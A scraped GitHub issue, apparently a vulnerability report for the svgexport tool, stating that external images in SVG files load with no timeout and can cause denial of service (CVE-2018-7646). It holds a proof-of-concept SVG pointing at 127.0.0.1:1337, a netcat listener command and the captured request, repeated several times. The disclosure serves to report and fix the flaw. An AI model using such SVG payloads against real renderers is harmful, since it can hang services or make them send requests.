We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello, it looks like there is no timeout for loading external image, this can lead to denial of service. <?xml version="1.0" standalone="no"?> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:ev="http://www.w3.org/2001/xml-events"> <defs> <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450"> <image xlink:href="http://127.0.0.1:1337" x="0" y="0" width="600" height="450" /> </pattern> </defs> <path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" /> </svg> Use netcat for example: razbe@alpha:$ nc -lnvp 1337 && svgexport example.svg test.png Listening on [0.0.0.0] (family 0, port 1337) Connection from [127.0.0.1] port 1337 [tcp/*] accepted (family 2, sport 45166) GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1 Accept: */* Connection: Keep-Alive Accept-Encoding: gzip, deflate Accept-Language: en-US,* Host: 127.0.0.1:1337
<?xml version="1.0" standalone="no"?> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:ev="http://www.w3.org/2001/xml-events"> <defs> <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450"> <image xlink:href="http://127.0.0.1:1337" x="0" y="0" width="600" height="450" /> </pattern> </defs> <path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" /> </svg>
razbe@alpha:$ nc -lnvp 1337 && svgexport example.svg test.png
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [127.0.0.1] port 1337 [tcp/*] accepted (family 2, sport 45166)
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: 127.0.0.1:1337
The CVE-2018-7646 was assigned.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Hello, it looks like there is no timeout for loading external image, this can lead to denial of service.
<?xml version="1.0" standalone="no"?> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:ev="http://www.w3.org/2001/xml-events"> <defs> <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450"> <image xlink:href="http://127.0.0.1:1337" x="0" y="0" width="600" height="450" /> </pattern> </defs> <path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" /> </svg>Use netcat for example:
razbe@alpha:$ nc -lnvp 1337 && svgexport example.svg test.pngListening on [0.0.0.0] (family 0, port 1337)Connection from [127.0.0.1] port 1337 [tcp/*] accepted (family 2, sport 45166)GET / HTTP/1.1User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1Accept: */*Connection: Keep-AliveAccept-Encoding: gzip, deflateAccept-Language: en-US,*Host: 127.0.0.1:1337The CVE-2018-7646 was assigned.
The text was updated successfully, but these errors were encountered: